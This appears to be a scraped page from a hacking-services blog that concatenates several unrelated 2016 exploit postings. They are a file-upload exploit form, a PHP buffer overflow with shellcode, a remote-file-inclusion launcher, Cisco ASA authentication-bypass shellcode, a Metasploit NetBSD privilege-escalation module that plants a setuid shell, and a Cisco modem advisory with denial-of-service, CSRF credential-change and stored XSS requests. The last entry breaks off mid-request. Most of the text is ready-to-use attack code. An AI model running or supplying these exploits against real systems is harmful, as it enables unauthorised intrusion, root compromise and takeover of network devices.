<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
1) Unauthenticated Unrestricted File Upload:
POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
Vulnerable Parameter: files[]
We can upload test.php and reach the file via the following link:
/files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86398153
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<?php
#############################################################################
## PHP 5.0.0 tidy_parse_file() Buffer Overflow Exploit
## Tested on Windows XP SP3 English
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 17/09/2016
## Buffer Overflow
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$junk = str_repeat("A", 2036); # 2036 x A
$eip = "\xaf\xc6\x17\x10"; # 0x1017c6af call esp @ php5ts.dll
# windows/exec - 144 bytes, Encoder: x86/shikata_ga_nai, EXITFUNC=seh, CMD=calc
$shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1".
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30".
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa".
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96".
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b".
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a".
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83".
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98".
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61".
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05".
"\x7f\xe8\x7b\xca";
$buffer = $junk.$eip.$shellcode;
tidy_parse_file(1,$buffer,1,1);
#tidy_repair_file(1,$buffer,1,1);
?>
<!--
# Title: AnoBBS 1.0.1 Remote File Inclusion Exploit
# Author: bd0rk || Germany
# Tested on: Ubuntu-Linux
# Twitter: twitter.com/bd0rk
# Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG
#Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788
#Download-Link: http://www.hotscripts.com/listings/jump/download/90434
#The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable.
>>>Exploitcode for Copy&Paste<<<
-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title>
<script language="JavaScript">
var dir="/progs/"
var file="/bbs_auth.php?"
var parameter ="prog_dir="
var shell="Insert your shellcode here"
function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}
rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbps;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>
</html>
#
# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
#
# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
# License: http://opensource.org/licenses/MIT
# Release Date: September 15, 2016
#
# Authors:
# Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
# Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
#
# Description:
# Additional EXTRABACON module for Cisco ASA version 9.2(3).
# This does not use the same shellcode as the Equation Group version,
# but accomplishes the same task of disabling the auth functions
# in less stages/bytes.
#
# Build/Run:
# 1) Save this file to versions/shellcode_asa923.py
# 2) Add the version string to fw_version_check()
# 3) Shellcode is for --pass-disable
#
vers = "asa923"
# there is a jmp esp @ 08 1d 70 1d
# 81d701c: e8 ff e4 ff ff call 81d5520 <_ctm_hw_free@@Base+0x50fd0>
my_ret_addr_len = 4
my_ret_addr_byte = "\x1d\x70\x1d\x08"
my_ret_addr_snmp = "29.112.29.8"
finder_len = 9
finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
finder_snmp = "139.124.36.20.139.7.255.224.144"
# ROPgadget --binary lina_92-3 --opcode 897dfc8b1685d2
# 0x9b78010 = function
# 0x9b78000 = byte boundary
# 0x8085a40
# 0x8085000
# preamble has a stack clean up and offset to where we first hijacked execution
# 0x9277386
preamble_len = 69
preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3"
preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"
postscript_len = 2
postscript_byte = "\x61\xc3"
postscript_snmp = "97.195"
launcher_len = 6
launcher_snmp = "144.144.144.144.144.144"
launcher_byte = "\x90\x90\x90\x90\x90\x90"
payload_nop_len = 116
payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
payload_PMCHECK_DISABLE_len = 70
payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
payload_AAAADMINAUTH_DISABLE_len = 66
payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'NetBSD mail.local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # Module
'akat1' # Discovery
],
'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
'References' =>
[
[ "URL", "http://akat1.pl/?id=2"],
[ "EDB", "40141"],
[ "CVE", "2016-6253"],
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
]
))
register_options([
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
], self.class)
end
def exploit
# lots of this file's format is based on pkexec.rb
# direct copy of code from exploit-db
main = %q{
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, "wb");
}
if (in == NULL || out == NULL) {
rv = -1;
goto out;
}
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0) {
rv = -1;
goto out;
}
}
out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}
int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
umask(0077);
login = getlogin();
if (login == NULL)
err(EXIT_FAILURE, "who are you?");
uid = getuid();
asprintf(&mailbox, MAILDIR "/%s", login);
if (mailbox == NULL)
err(EXIT_FAILURE, NULL);
if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}
if (mailbox_backup != NULL) {
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");
}
/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");
/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);
for(;;)
system(buf);
/* NOTREACHED */
default:
umask(0022);
for(;;) {
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
close(fd);
sync();
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, "[+] won race!\n");
break;
}
}
}
break;
}
(void)waitpid(pid, NULL, 0);
if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}
/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");
if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
for(;;sleep(1)) {
if (access("/tmp/ksh", F_OK) != -1)
break;
}
/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");
execl("/tmp/ksh", "ksh", NULL);
return 0;
}
}
# patch in our variable maildir and atrunpath
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
main.gsub!(/#define MAILDIR "\/var\/mail"/,
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
payload_file = "#{rand_text_alpha(8)}"
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
vprint_status("Writing Payload to #{payload_path}")
# patch in to run our payload as part of ksh
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
write_file(payload_path, payload.encoded)
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)
print_status "Writing exploit to #{executable_path}.c"
# clean previous bad attempts to prevent c code from exiting
rm_f executable_path
rm_f '/tmp/atrun'
whoami = cmd_exec('whoami')
rm_f "/tmp/#{whoami}"
write_file("#{executable_path}.c", main)
print_status("Compiling #{executable_path}.c via gcc")
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
output.each_line { |line| vprint_status(line.chomp) }
print_status('Starting the payload handler...')
handler({})
print_status("Executing at #{Time.now}. May take up to 10min for callback")
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
output.each_line { |line| vprint_status(line.chomp) }
# our sleep timer
stime = Time.now.to_f
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
print_status("#{Time.now}")
register_file_for_cleanup(executable_path)
register_file_for_cleanup("#{executable_path}.out")
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
end
end
# Title: Cisco EPC 3925 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
# Date: 15.09.2016
# Author: Patryk Bogdan
========
Vulnerability list:
1. HTTP Response Injection via 'Lang' Cookie
2. DoS via 'Lang' Cookie
3. DoS in Wireless Client List via 'h_sortWireless'
4. (Un)authorized modem restart (Channel Selection)
5. CSRF
6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
========
1. HTTP Response Injection
It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.
#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)
#2 - Request:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: pwned
Set-Cookie: SessionID=219380
Content-Length: 1398
(...)
2. DoS via 'Lang' Cookie
Modem crashes when cookie variable in request is too long.
#1 - Request (crash via http injection):
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Docsis_system.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Set-Cookie: SessionID=163190
Content-Length: 18743
(...)
At this point modem crashes:
C:\Users\Patryk>ping -n 10 192.168.100.1
Pinging 192.168.100.1 with 32 bytes of data:
Request timed out.
Request timed out.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
(...)
DoS can be also executed with single HTTP request, like this:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close
3. DoS in Wireless Client List via 'h_sortWireless'
Modem crashes when variable for POST parameter 'h_sortWireless' is too long.
#1 - Request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/WClientMACList.asp
Cookie: Lang=en; SessionID=71750
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close
( ... crash ... )
4. (Un)authorized channel Selection
On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.
5. CSRF
There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.
PoC:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>
6. Stored XSS in Administration -> Reporting
#1 - Request:
POST /goform/Log HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Log.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Log.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 6454
(...)
<TD>
<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
</TD>
<TD>
<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
</TD>
<TD>
<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
</TD>
</TR>
(...)
7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)
#1 - Request:
POST /goform/Administration HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 746
